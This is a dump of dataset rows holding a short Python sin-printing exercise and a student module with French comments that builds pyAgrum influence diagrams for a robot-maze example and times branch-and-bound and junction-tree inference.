| 11.285714 | 32 | 0.71519 | 20 | 158 | 5.65 | 0.55 | 0.238938 | 0.345133 | 0.318584 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.202532 | 158 | 13 | 33 | 12.153846 | 0.896825 | 0 | 0 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.428571 | 0.142857 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
d7e64e084f978deaa3d7b6e932b54b66f16a783e | 94 | py | Python | Chapter 02/ch2_35.py | bpbpublications/TEST-YOUR-SKILLS-IN-PYTHON-LANGUAGE | f6a4194684515495d00aa38347a725dd08f39a0c | [
"MIT"
] | null | null | null | Chapter 02/ch2_35.py | bpbpublications/TEST-YOUR-SKILLS-IN-PYTHON-LANGUAGE | f6a4194684515495d00aa38347a725dd08f39a0c | [
"MIT"
] | null | null | null | Chapter 02/ch2_35.py | bpbpublications/TEST-YOUR-SKILLS-IN-PYTHON-LANGUAGE | f6a4194684515495d00aa38347a725dd08f39a0c | [
"MIT"
] | null | null | null | import math
print(math.sin(0))
print(math.sin(45.5))
# using print() to print the result | 18.8 | 36 | 0.680851 | 17 | 94 | 3.764706 | 0.647059 | 0.28125 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.051282 | 0.170213 | 94 | 5 | 36 | 18.8 | 0.769231 | 0.351064 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 7 |
0bdd40d75a85044f5f80c90fd6efbbe5d7d19f2c | 49,430 | py | Python | branchAndBound/exemple_robot.py | davidPinaud/PANDROIDE_InfDiag_BandB | 1e5bafaf81f5f677b685c5382694a3ccb85963ab | [
"MIT"
] | null | null | null | branchAndBound/exemple_robot.py | davidPinaud/PANDROIDE_InfDiag_BandB | 1e5bafaf81f5f677b685c5382694a3ccb85963ab | [
"MIT"
] | null | null | null | branchAndBound/exemple_robot.py | davidPinaud/PANDROIDE_InfDiag_BandB | 1e5bafaf81f5f677b685c5382694a3ccb85963ab | [
"MIT"
] | null | null | null |
from pylab import *
import math
import pyAgrum as gum
import pyAgrum.lib.notebook as gnb
import numpy as np
from bandbLIMID import BranchAndBoundLIMIDInference
import time
def createRandomID(nbDecisionNodes:int,nbChanceNodes:int,nbUtilityNode:int,nbArc:int,nbAppel=0,verbose=False)->gum.InfluenceDiagram:
"""creates a random ID
Parameters
----------
nbDecisionNodes : int
number of decision nodes
nbChanceNodes : int
number of chance nodes
nbUtilityNode : int
number of utility nodes
nbArc : int
number of arcs
Returns
-------
gum.InfluenceDiagram
the random ID
"""
if(verbose):
print(f"try n°{nbAppel+1}")
dagTestCycle=gum.DAG()
stringID=""
dec=dict()
chance=dict()
utility=dict()
for i in range(nbDecisionNodes):
#ID.addDecisionNode(gum.LabelizedVariable(aName=f"d{i}",aDesc="",nbrLabel=np.random.randint(0,6)))
stringID+=f"*d{i};"
dec[f'd{i}']=dagTestCycle.addNode()
for i in range(nbChanceNodes):
#ID.addChanceNode(gum.LabelizedVariable(aName=f"c{i}",aDesc="",nbrLabel=np.random.randint(0,6)))
stringID+=f"c{i};"
chance[f'c{i}']=dagTestCycle.addNode()
for i in range(nbUtilityNode):
#ID.addUtilityNode(gum.LabelizedVariable(aName=f"u{i}",aDesc="",nbrLabel=1))
stringID+=f"$u{i};"
utility[f'u{i}']=dagTestCycle.addNode()
for i in range(nbArc):
debut=time.time()
if(time.time()-debut>0.000001 and nbAppel<=3):
return createRandomID(nbDecisionNodes,nbChanceNodes,nbUtilityNode,nbArc,nbAppel=nbAppel+1)
elif(time.time()-debut>0.000001 and nbAppel>3):
raise Exception("ID construction failed, please start over")
r=np.random.randint(1,5)
found=False
# while(r==0 and not found):
# print("1")
# print("°")
# d1=np.random.randint(0,nbDecisionNodes)
# d2=np.random.randint(0,nbDecisionNodes)
# if(time.time()-debut>0.000001 and nbAppel<=3):
# return createRandomID(nbDecisionNodes,nbChanceNodes,nbUtilityNode,nbArc,nbAppel=nbAppel+1)
# try:
# dagTestCycle.addArc(dec[f"d{d1}"],dec[f"d{d2}"])
# stringID+=f"d{d1}->d{d2};"
# found=True
# except:
# found=False
while(r==1 and not found):
print("2")
print("°")
d=np.random.randint(0,nbDecisionNodes)
c=np.random.randint(0,nbChanceNodes)
if(time.time()-debut>0.000001 and nbAppel<=3):
return createRandomID(nbDecisionNodes,nbChanceNodes,nbUtilityNode,nbArc,nbAppel=nbAppel+1)
try:
dagTestCycle.addArc(dec[f"d{d}"],chance[f"c{c}"])
stringID+=f"d{d}->c{c};"
found=True
except:
found=False
while(r==2 and not found):
print("3")
print("°")
d=np.random.randint(0,nbDecisionNodes)
c=np.random.randint(0,nbChanceNodes)
if(time.time()-debut>0.000001 and nbAppel<=3):
return createRandomID(nbDecisionNodes,nbChanceNodes,nbUtilityNode,nbArc,nbAppel=nbAppel+1)
try:
dagTestCycle.addArc(chance[f"c{c}"],dec[f"d{d}"])
stringID+=f"c{c}->d{d};"
found=True
except:
found=False
while(r==3 and not found):
print("4")
print("°")
c1=np.random.randint(0,nbChanceNodes)
c2=np.random.randint(0,nbChanceNodes)
if(time.time()-debut>0.000001 and nbAppel<=3):
return createRandomID(nbDecisionNodes,nbChanceNodes,nbUtilityNode,nbArc,nbAppel=nbAppel+1)
try:
dagTestCycle.addArc(chance[f"c{c1}"],chance[f"c{c2}"])
stringID+=f"c{c1}->c{c2};"
found=True
except:
found=False
# while(r==4 and not found):
# print("5")
# print("°")
# c=np.random.randint(0,nbChanceNodes)
# u=np.random.randint(0,nbUtilityNode)
# if(time.time()-debut>0.000001 and nbAppel<=3):
# return createRandomID(nbDecisionNodes,nbChanceNodes,nbUtilityNode,nbArc,nbAppel=nbAppel+1)
# try:
# dagTestCycle.addArc(chance[f"c{d}"],utility[f"u{u}"])
# stringID+=f"c{c}->u{u};"
# found=True
# except:
# found=False
while(r==4 and not found):
print("5")
print("°")
d=np.random.randint(0,nbDecisionNodes)
u=np.random.randint(0,nbUtilityNode)
if(time.time()-debut>0.000001 and nbAppel<=3):
return createRandomID(nbDecisionNodes,nbChanceNodes,nbUtilityNode,nbArc,nbAppel=nbAppel+1)
try:
dagTestCycle.addArc(dec[f"d{d}"],utility[f"u{u}"])
stringID+=f"d{d}->u{u};"
found=True
except:
found=False
try:
ID=gum.fastID(stringID)
for node in ID.nodes():
if(ID.isUtilityNode(node) and not ID.parents(node)):
nodeID=np.random.choice([nodeID for nodeID in ID.nodes() if not ID.isUtilityNode(nodeID)],size=1)
print("choices",nodeID[0],node,type(nodeID[0]),type(node))
ID.addArc(int(nodeID[0]),node)
except:
if(nbAppel<=3):
return createRandomID(nbDecisionNodes,nbChanceNodes,nbUtilityNode,nbArc,nbAppel=nbAppel+1)
return ID
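createRandomID retries itself (via nbAppel) up to 3 times when arc insertion stalls, then gives up with an exception. A minimal standalone sketch of that bounded-retry pattern, using a hypothetical flaky_build function that fails on its first two attempts (all names here are illustrative, not part of the original API):

```python
def build_with_retry(build, max_retries=3, attempt=0):
    """Call build(attempt); on failure, retry with attempt+1 up to max_retries."""
    try:
        return build(attempt)
    except Exception:
        if attempt < max_retries:
            return build_with_retry(build, max_retries, attempt + 1)
        raise RuntimeError("construction failed, please start over")

attempts_seen = []
def flaky_build(attempt):
    attempts_seen.append(attempt)
    if attempt < 2:  # fail on the first two tries, like a rejected arc
        raise ValueError("cycle detected")
    return "ok"

result = build_with_retry(flaky_build)
print(result, attempts_seen)  # ok [0, 1, 2]
```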
def createIDRobot(n,xInitial,yInitial,maze):
"""Function that creates the ID given as an example in the 2013 "Solving limited memory influence diagrams" paper
Parameters
----------
n : int
number of stages in the example
xInitial : int
the initial x-axis position of the robot
yInitial : int
the initial y-axis position of the robot
maze : str
the maze for which the example is built; it changes the values of the CPTs
Returns
-------
InfluenceDiagram
the example ID
"""
"""
chances holds all the chance-node ids of the ID; by convention, if the id is equal to
0 mod(6) --> the node is an x
1 mod(6) --> the node is a y
2 mod(6) --> the node is an n
3 mod(6) --> the node is an e
4 mod(6) --> the node is an s
5 mod(6) --> the node is a w
decision holds all the decision-node ids of the ID; by convention, the id
6*n+i, for every i in 0,...,n-1, is the decision node of stage i.
"""
"""
Method building the influence diagram for the robot example from the paper "2013_Solving_Limited_Memory_Influence_Diagrams_Using_BranchAndBound"
Input:
n - number of stages
xInitial - initial x coordinate where the robot is placed
yInitial - initial y coordinate where the robot is placed
Output:
ID - the influence diagram modelling the problem
"""
#gris is the set of coordinates of the grey (wall) cells
cases,gris,caseObj,nbLignes,nbColonnes=getCasesAndGris2(maze)
#lists of the cells from which a step in a given direction is possible (i.e. no wall in that direction from that cell)
casesOuPossibleAllerGauche=[]
casesOuPossibleAllerHaut=[]
casesOuPossibleAllerDroite=[]
casesOuPossibleAllerBas=[]
#build the lists above
for x in range(nbLignes):
for y in range(nbColonnes):
if(cases[x,y,0]==0):
casesOuPossibleAllerGauche.append([x,y])
if(cases[x,y,1]==0):
casesOuPossibleAllerHaut.append([x,y])
if(cases[x,y,2]==0):
casesOuPossibleAllerDroite.append([x,y])
if(cases[x,y,3]==0):
casesOuPossibleAllerBas.append([x,y])
#create the ID
ID=gum.fastID("")
#all the chance nodes, grouped by stage (index 0 is the first stage)
chances=np.zeros((n,6))
#all the decision nodes; index 0 is the first stage's
decision=np.zeros(n)
for i in range(n):
#define the names once, to avoid unnecessary operations
x=f"x_{i}"
y=f"y_{i}"
ns=f"ns_{i}"
es=f"es_{i}"
ss=f"ss_{i}"
ws=f"ws_{i}"
d=f"d_{i}"
#create the nodes
#add the x-position node
chances[i][0]=int(ID.addChanceNode(gum.LabelizedVariable(x,"",nbLignes),6*i))
#add the y-position node
chances[i][1]=int(ID.addChanceNode(gum.LabelizedVariable(y,"",nbColonnes),6*i+1))
#add the sensor nodes, one per cardinal direction
chances[i][2]=ID.addChanceNode(gum.LabelizedVariable(ns,"",2),6*i+2)
chances[i][3]=ID.addChanceNode(gum.LabelizedVariable(es,"",2),6*i+2+1)
chances[i][4]=ID.addChanceNode(gum.LabelizedVariable(ss,"",2),6*i+2+2)
chances[i][5]=ID.addChanceNode(gum.LabelizedVariable(ws,"",2),6*i+2+3)
#add the decision node
decision[i]=int(ID.addDecisionNode(gum.LabelizedVariable(d,"",5),i+50000))
#create the arcs between x,y and the current stage's sensors
ID.addArc(x,y)
ID.addArc(x,ns)
ID.addArc(x,es)
ID.addArc(x,ss)
ID.addArc(x,ws)
ID.addArc(y,ns)
ID.addArc(y,es)
ID.addArc(y,ss)
ID.addArc(y,ws)
#create the arcs from ALL the sensor chance nodes towards the current
#stage's decision node
for stage in range(i+1):
ID.addArc(int(chances[(stage)][2]),ID.idFromName(d))
ID.addArc(int(chances[(stage)][3]),ID.idFromName(d))
ID.addArc(int(chances[(stage)][4]),ID.idFromName(d))
ID.addArc(int(chances[(stage)][5]),ID.idFromName(d))
#create the arcs from x_i-1 to x_i and from y_i-1 to y_i (only from the second stage on)
if(i>0):
ID.addArc(f"x_{i-1}",y)
ID.addArc(f"x_{i-1}",x)
ID.addArc(f"y_{i-1}",y)
ID.addArc(f"y_{i-1}",x)
ID.addArc(f"d_{i-1}",f"d_{i}")
#create the arcs from the decision node of stage i-1 to x_i and y_i
ID.addArc(f"d_{i-1}",x)
ID.addArc(f"d_{i-1}",y)
#fill the potentials of the sensor chance nodes ns es ss ws, with support {0=no wall,1=wall}
for h in range(nbLignes):
for j in range(nbColonnes):
if([h,j] in casesOuPossibleAllerHaut):
ID.cpt(ns)[{x:h,y:j}]=[1,0]
else:
ID.cpt(ns)[{x:h,y:j}]=[0,1]
if([h,j] in casesOuPossibleAllerBas):
ID.cpt(ss)[{x:h,y:j}]=[1,0]
else:
ID.cpt(ss)[{x:h,y:j}]=[0,1]
if([h,j] in casesOuPossibleAllerDroite):
ID.cpt(es)[{x:h,y:j}]=[1,0]
else:
ID.cpt(es)[{x:h,y:j}]=[0,1]
if([h,j] in casesOuPossibleAllerGauche):
ID.cpt(ws)[{x:h,y:j}]=[1,0]
else:
ID.cpt(ws)[{x:h,y:j}]=[0,1]
if [h,j] in gris:
ID.cpt(ns)[{x:h,y:j}]=[0,1]
ID.cpt(es)[{x:h,y:j}]=[0,1]
ID.cpt(ss)[{x:h,y:j}]=[0,1]
ID.cpt(ws)[{x:h,y:j}]=[0,1]
"""#fill the potentials of the position nodes x y at the first stage
if(i==0):
ID.cpt(x)[xInitial]=1
ID.cpt(y)[{x:xInitial,y:yInitial}]=1
#fill the potentials of the position nodes x y at the later stages
else:
remplirID(ID,x,fillX,i,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris)
remplirID(ID,y,fillY,i,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris)"""
#add the arcs between the last decision node, the last chance nodes x and y, and the utility node
xn=f"x_{n}"
yn=f"y_{n}"
ID.addArc(int(decision[n-1]),ID.addChanceNode(gum.LabelizedVariable(xn,"",nbLignes)))
ID.addArc(int(decision[n-1]),ID.addChanceNode(gum.LabelizedVariable(yn,"",nbColonnes)))
ID.addArc(xn,yn)
ID.addUtilityNode(gum.LabelizedVariable("u","",1))
ID.addArc(xn,"u")
ID.addArc(yn,"u")
ID.addArc(f"x_{n-1}",xn)
ID.addArc(f"y_{n-1}",xn)
ID.addArc(f"x_{n-1}",yn)
ID.addArc(f"y_{n-1}",yn)
#fill the potentials of the last chance nodes and of the utility node
"""remplirID(ID,xn,fillX,n,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris)
remplirID(ID,yn,fillY,n,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris)
"""
ID.utility(ID.idFromName("u"))[{f"x_{n}":caseObj[0],f"y_{n}":caseObj[1]}]=1
l=[]
for k in range(n):
x=f"x_{k}"
y=f"y_{k}"
l.append(x)
l.append(y)
l=l+[xn,yn]
for node in l:
for i in ID.cpt(node).loopIn():
ID.cpt(node).set(i,np.random.rand())
ID.cpt(node).normalizeAsCPT()
return ID
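The final loop above fills each position CPT with uniform random values and renormalizes it with normalizeAsCPT. The same normalization, sketched with plain NumPy (the 4x5 shape is a made-up stand-in for a CPT with 4 parent configurations and 5 child values):

```python
import numpy as np

rng = np.random.default_rng(0)
# hypothetical CPT: 4 parent configurations x 5 child values
cpt = rng.random((4, 5))
cpt /= cpt.sum(axis=1, keepdims=True)  # each row becomes a probability distribution
print(cpt.sum(axis=1))  # every row now sums to ~1.0
```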
def remplirID(ID,NomNoeud,fonctionFill,stage,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris):
"""
Method that fills the potential table of the position nodes x and y at the stages after the first one
Input:
InfluenceDiagram ID - the influence diagram in which to find the nodes
String NomNoeud - the name of the node whose potential table is filled
function fonctionFill - the function used to fill the table's cells
Integer stage - integer identifying the current stage
Output:
void
"""
I=gum.Instantiation(ID.cpt(NomNoeud))
while not I.end():
ID.cpt(NomNoeud).set(I,fonctionFill(I,stage,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris))
I.inc()
def fillX(I,i,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris):
valeurXStageDavant,valeurYStageDavant,valeurX,decisionDStageDavant=[I.val(nomNoeud) for nomNoeud in [f"x_{i-1}",f"y_{i-1}",f"x_{i}",f"d_{i-1}"]]
"""
Method that determines which probability to put in a given cell of the potential table of the chance node for the robot's X position (abscissa) at a given stage.
Input:
Instantiation I - a cell of the potential table being filled; it is tested to decide which probability this cell gets.
Integer i - integer for the current stage.
"""
if([valeurXStageDavant,valeurYStageDavant] in gris):
return 0
if(abs(valeurX-valeurXStageDavant)>1):
return 0
#-----------------------
if(decisionDStageDavant==0): #decision = left
if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
if(valeurX==valeurXStageDavant-1):
return 0.89+0.01
if(valeurX==valeurXStageDavant):
return 0.089
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite): #also check that a step to the right is possible before putting a probability on it
return 0.01
else:
if(valeurX==valeurXStageDavant-1): #(already 0 by default, kept for readability)
return 0
if(valeurX==valeurXStageDavant):
return 0.089
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
return 0.01
#-----------------------
if(decisionDStageDavant==1): #decision = up
if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerHaut):
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
return 0.01
if(valeurX==valeurXStageDavant):
return 0.89+0.089
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
return 0.01
else:
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
return 0.01
if(valeurX==valeurXStageDavant): #unsure which probability to use here: 0.89, 0.089 or 0??
return 0.089
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
return 0.01
#-----------------------
if(decisionDStageDavant==2): #decision = right
if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
return 0.01
if(valeurX==valeurXStageDavant):
return 0.089
if(valeurX==valeurXStageDavant+1):
return 0.01+0.89
else:
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
return 0.01
if(valeurX==valeurXStageDavant): #unsure which probability to use here: 0.89, 0.089 or 0??
return 0.089
if(valeurX==valeurXStageDavant+1):
return 0
#-----------------------
if(decisionDStageDavant==3): #decision = down
if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerBas):
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
return 0.01
if(valeurX==valeurXStageDavant):
return 0.89+0.089
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
return 0.01
else:
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
return 0.01
if(valeurX==valeurXStageDavant): #unsure which probability to use here: 0.89, 0.089 or 0??
return 0.089
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
return 0.01
#-----------------------
if(decisionDStageDavant==4): #decision = stay put
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
return 0.01
if(valeurX==valeurXStageDavant):
return 0.89
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
return 0.01
return 0
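fillX hard-codes the paper's noise model: the intended step succeeds with probability around 0.89, the robot stays put with 0.089, and a slip to an open neighbouring cell gets 0.01. A pure-Python sketch of just the "move left" case along one row of the maze (the function name and the boolean wall flags are illustrative simplifications of the cell lists used above):

```python
def p_x_after_left(x_prev, x_new, can_left, can_right):
    """P(x_new | x_prev, decision=left) for a single maze row, per the noise model above."""
    if x_new == x_prev - 1:           # intended move, plus the mass of the blocked right slip
        return 0.89 + 0.01 if can_left else 0.0
    if x_new == x_prev:               # robot stays put
        return 0.089
    if x_new == x_prev + 1 and can_right:  # slip in the opposite direction
        return 0.01
    return 0.0

# from cell 3, with both sides open: step left, stay, slip right
probs = [p_x_after_left(3, x, True, True) for x in (2, 3, 4)]
print(probs)
```

As in the original, these values are not normalized here; createIDRobot renormalizes the CPTs afterwards.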
def fillY(I,i,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris):
valeurXStageDavant,valeurYStageDavant,valeurX,valeurY,decisionDStageDavant=[I.val(nomNoeud) for nomNoeud in [f"x_{i-1}",f"y_{i-1}",f"x_{i}",f"y_{i}",f"d_{i-1}"]]
"""
Method that determines which probability to put in a given cell of the potential table of the chance node for the robot's Y position (ordinate) at a given stage.
Input:
Instantiation I - a cell of the potential table being filled; it is tested to decide which probability this cell gets.
Integer i - integer for the current stage.
"""
if([valeurXStageDavant,valeurYStageDavant] in gris):
return 0
if(abs(valeurX-valeurXStageDavant)>1 or abs(valeurY-valeurYStageDavant)>1):
return 0
#-----------------------
if(decisionDStageDavant==0): #decision = left
if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
if(valeurX==valeurXStageDavant): #X did not move
if(valeurY==valeurYStageDavant):#Y did not move
return 0.089
if(valeurY==valeurYStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerBas):#Y moved down
return 0.001
if(valeurX==valeurXStageDavant-1): #X stepped left
if(valeurY==valeurYStageDavant):#Y did not move
return 0.89
if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):#Y moved down (note valeurX, not valeurXStageDavant, since X moved)
return 0.001
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite): #X stepped right
if(valeurY==valeurYStageDavant):#Y did not move
return 1-0.001
if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):#Y moved down
return 0.001
#-----------------------
if(decisionDStageDavant==1): #decision = up
if([valeurX,valeurYStageDavant] in casesOuPossibleAllerHaut): #NOTE: valeurX is used directly here
if(valeurY==valeurYStageDavant-1):#Y moved up
return 0.89
if(valeurY==valeurYStageDavant):#Y did not move
return 0.089
if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):#Y moved down
return 0.001
#-----------------------
if(decisionDStageDavant==2): #decision = right
if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
if(valeurX==valeurXStageDavant): #X did not move
if(valeurY==valeurYStageDavant):#Y did not move
return 0.089
if(valeurY==valeurYStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerBas):#Y moved down
return 0.001
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche): #X stepped left
if(valeurY==valeurYStageDavant):#Y did not move
return 1-0.001
if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):#Y moved down (note valeurX, not valeurXStageDavant, since X moved)
return 0.001
if(valeurX==valeurXStageDavant+1 ): #X stepped right
if(valeurY==valeurYStageDavant):#Y did not move
return 0.89
if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):#Y moved down
return 0.001
#-----------------------
if(decisionDStageDavant==3): #decision = down
if([valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):
if(valeurY==valeurYStageDavant+1):#Y moved down
return 0.89
if(valeurY==valeurYStageDavant):#Y did not move
return 0.089
if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):#Y moved down
return 0.001
#-----------------------
if(decisionDStageDavant==4): #decision = stay put
if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):
return 0.001
return 0
def getCasesAndGris2(maze):
"""
Function returning two arrays:
gris : array of size-two arrays, the set of coordinates of the grey (wall) cells
cases : 3-dimensional array storing, for each cardinal direction and each cell, whether a step in that
direction is possible (i.e. there is no wall in that direction)
convention: cases[x,y,i]=0 if there is no wall in direction i from cell x,y, and cases[x,y,i]=1 otherwise. i belongs to [0,1,2,3], corresponding to west, north, east, south respectively.
"""
nbLignes=len(maze)
nbColonnes=len(maze[0])
cases=np.zeros((nbLignes,nbColonnes,4)) #cases stores, per direction, whether a step in that direction is possible (0 yes, 1 no)
gris=[]
for ligne in range(nbLignes):
cases[ligne,0,0]=1#from the first column, one cannot go left
cases[ligne,nbColonnes-1,2]=1#from the last column, one cannot go right
for colonne in range(nbColonnes):
cases[0,colonne,1]=1#from the first row, one cannot go up
cases[nbLignes-1,colonne,3]=1#from the last row, one cannot go down
if(maze[ligne][colonne]=="|" or maze[ligne][colonne]=="-"):
gris.append([ligne,colonne])
cases[ligne,colonne,0]=1#inside a wall, no move is possible
cases[ligne,colonne,1]=1
cases[ligne,colonne,2]=1
cases[ligne,colonne,3]=1
if colonne>0 :
cases[ligne,colonne-1,2]=1 # look right (cases[ligne,colonne-1] is to the left of maze[ligne][colonne])
if ligne<nbLignes-1 :
cases[ligne+1,colonne,1]=1 #up
if ligne>0 :
cases[ligne-1,colonne,3]=1 #down
if colonne<nbColonnes-1 :
cases[ligne,colonne+1,0]=1 #left
elif maze[ligne][colonne]=="$" :
caseObj=[ligne,colonne]
return cases,gris,caseObj,nbLignes,nbColonnes
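getCasesAndGris2 encodes, per cell, whether a step is blocked in each direction (0 = free, 1 = wall; directions indexed west, north, east, south). A standalone sketch on a tiny hypothetical maze, using plain nested lists instead of a NumPy array; it marks grid borders and wall characters, but omits the original's extra step of also blocking the sides of cells adjacent to a wall:

```python
def parse_maze(maze):
    """blocked[r][c] = [west, north, east, south] flags (1 = step blocked)."""
    rows, cols = len(maze), len(maze[0])
    blocked = [[[0, 0, 0, 0] for _ in range(cols)] for _ in range(rows)]
    for r in range(rows):
        for c in range(cols):
            cell = blocked[r][c]
            if c == 0:        cell[0] = 1  # west border
            if r == 0:        cell[1] = 1  # north border
            if c == cols - 1: cell[2] = 1  # east border
            if r == rows - 1: cell[3] = 1  # south border
            if maze[r][c] in "|-":        # wall cell: fully blocked
                blocked[r][c] = [1, 1, 1, 1]
    return blocked

b = parse_maze(["---",
                "- -",
                "---"])
print(b[0][0], b[1][1])  # wall corner vs. the free centre cell
```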
#--Code to build a maze, compute the relaxation and display them in a notebook
# maze=["---------",
# "-- --",
# "- - - -",
# "-- - - --",
# "- - - $-",
# "-- --",
# "---------"]
# nbStage=4
# xInitial=3
# yInitial=2
# ID=createIDRobot(nbStage,xInitial,yInitial,maze)
# gnb.showInfluenceDiagram(ID)
# ordre=[]
# for i in range(nbStage):
# ordre.append(ID.idFromName("d_"+str(i)))
# bnb=BranchAndBoundLIMIDInference(ID,ordre)
#gnb.showInfluenceDiagram(bnb.IDRelaxe)
#Functions to measure size+time
def run():
xInitial = 7
yInitial = 4
for level in range(2, 5):
robot = createIDRobot(level, 2, 2,maze)
start = time.time()
ie = gum.ShaferShenoyLIMIDInference(robot)
mid = time.time()
ie.makeInference()
stop = time.time()
print(f"{level} : {mid-start:10.3f}s - {stop-mid:10.3f}s")
def human_readable(n):
def div1024(x): return x//1024, x % 1024
res = ""
for s in ["o", "Ko", "Mo", "Go"]:
n, r = div1024(n)
if r > 0:
res = f"{r}{s} {res}"
if n == 0:
return res
return f"{n}To {res}"
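human_readable repeatedly divides by 1024 and prepends a unit suffix ("o" for octets, i.e. bytes). Restated standalone for a quick check, identical to the definition above:

```python
def human_readable(n):
    """Format a byte count with o/Ko/Mo/Go/To suffixes (1024-based)."""
    def div1024(x):
        return x // 1024, x % 1024
    res = ""
    for s in ["o", "Ko", "Mo", "Go"]:
        n, r = div1024(n)
        if r > 0:
            res = f"{r}{s} {res}"
        if n == 0:
            return res
    return f"{n}To {res}"

print(human_readable(1500))  # 1Ko 476o  (note: a trailing space is kept, as in the original)
```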
def nbParamInClique(model, jt, n):
nb = 8 # size of python's float
for i in jt.clique(n):
nb *= model.variable(i).domainSize()
return nb
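nbParamInClique estimates a clique's potential-table size as 8 bytes (one Python float) times the product of its variables' domain sizes. The same arithmetic on a plain list of domain sizes, without the pyAgrum model and junction tree (the sizes below are made up):

```python
def clique_bytes(domain_sizes, bytes_per_float=8):
    """Memory footprint of a table over variables with the given domain sizes."""
    nb = bytes_per_float
    for size in domain_sizes:
        nb *= size
    return nb

print(clique_bytes([2, 3, 4]))  # 8 * 2 * 3 * 4 = 192
```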
def simule():
xInitial = 7
yInitial = 4
timeInf=[]
timeJonc=[]
largeurArbre=[]
tailleMem=[]
for level in range(2, 11):
robot = createIDRobot(level, 2, 2,maze)
start = time.time()
ie = gum.ShaferShenoyLIMIDInference(robot)
mid = time.time()
jt = ie.junctionTree()
maxtw = max([len(jt.clique(n)) for n in jt.nodes()])
maxsize = max([nbParamInClique(robot, jt, n) for n in jt.nodes()])
stop = time.time()
timeInf.append(mid-start)
timeJonc.append(stop-mid)
largeurArbre.append(maxtw)
tailleMem.append(human_readable(maxsize))
